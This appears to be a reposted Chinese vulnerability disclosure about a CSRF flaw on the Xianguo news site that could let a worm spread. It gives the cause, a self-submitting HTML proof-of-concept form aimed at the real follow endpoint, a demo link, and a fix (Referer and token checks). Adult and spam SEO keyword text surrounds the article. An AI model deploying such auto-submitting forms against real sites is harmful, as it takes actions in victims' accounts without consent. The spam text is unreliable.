成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

鮮果網某處CSRF漏洞可蔓延蠕蟲

安全 漏洞
鮮果網某處CSRF漏洞,可能導致蠕蟲蔓延,在未經用戶同意的情況下發布文字、加關注等等!

鮮果網某處CSRF漏洞,可能導致蠕蟲蔓延,在未經用戶同意的情況下發布文字、加關注等等!

詳細說明:在接受POST和GET的信息的時候,未對POST來路(Referer)進行驗證,同時也沒有在POST的信息中加token驗證信息的正確性,導致漏洞產生。

演示地址:http://in.imlonghao.com/WooYun-XXXXX/ (用戶名/密碼:imlonghao)

登錄狀態下訪問,會自動發一條名為Hello World的微博,并會關注一個用戶。

漏洞地址:http://xianguo.com/beings/follow

<html>

<body>

<form id="imlonghao" name="imlonghao" action="http://xianguo.com/beings/follow" method="post">

<input type="text" name="beingsIds" value="1378148" />

<input type="text" name="parentId" value="0" />

<input type="text" name="ftype" value="0" />

</form>

<script>

document.imlonghao.submit();

</script>

</body>

</html>

接口返回信息

鮮果網某處CSRF漏洞可蔓延蠕蟲

效果

[[97443]]

【發文字】

修復方案:

檢查POST來路Referer

在POST的信息中加token

責任編輯:藍雨淚 來源: 2cto
相關推薦

2011-08-31 14:38:40

2013-04-24 15:56:40

2015-02-10 13:24:27

CSRF漏洞CSRF

2010-07-20 10:26:50

2013-12-02 13:34:55

2014-07-17 15:47:52

2025-05-07 07:50:00

漏洞終端安全網絡攻擊

2009-11-09 19:59:47

2014-08-01 09:12:39

2014-12-30 14:02:54

2017-09-22 12:31:08

云計算容器容器蔓延

2019-09-17 10:06:46

數據庫程序員網絡安全

2011-05-10 09:55:14

2010-07-28 16:02:51

2014-06-12 13:44:19

2015-03-10 18:07:53

2021-12-23 09:47:36

Log4jRCE漏洞DoS漏洞

2015-03-06 17:02:51

2020-07-16 11:51:37

漏洞WindowsDNS服務器

2021-12-23 16:35:54

Apache Log4
點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 国产精品久久久久一区二区 | 中文字幕在线一区二区三区 | 国产精品久久久久久久 | 日韩精品一区二区三区视频播放 | 午夜精品 | 亚洲一区二区三区视频在线 | 91日韩| 婷婷色婷婷 | 国产精品视频在线免费观看 | 久久久区| 中文字幕成人av | 黄色大片在线播放 | av播播| 中文字幕第二十页 | 精品国产欧美一区二区 | 午夜影院视频在线观看 | 亚洲欧美日韩精品久久亚洲区 | 尤物在线精品视频 | 一级无毛片 | 在线只有精品 | 欧美日韩黄色一级片 | 中文字幕国产一区 | 久久综合久| 国产精品久久久久久久久久久久久 | 国产成人精品网站 | 福利一区二区 | 香蕉久久久 | 8x国产精品视频一区二区 | 国产精品色 | 精品久久久久久红码专区 | 久久成人亚洲 | www.嫩草| 成人在线不卡 | 激情欧美一区二区三区 | 一级做a爰片久久毛片免费看 | av三级| 91视频在线观看免费 | 成人自拍视频网站 | 一区二区三区免费 | 97av在线| 毛片久久久 |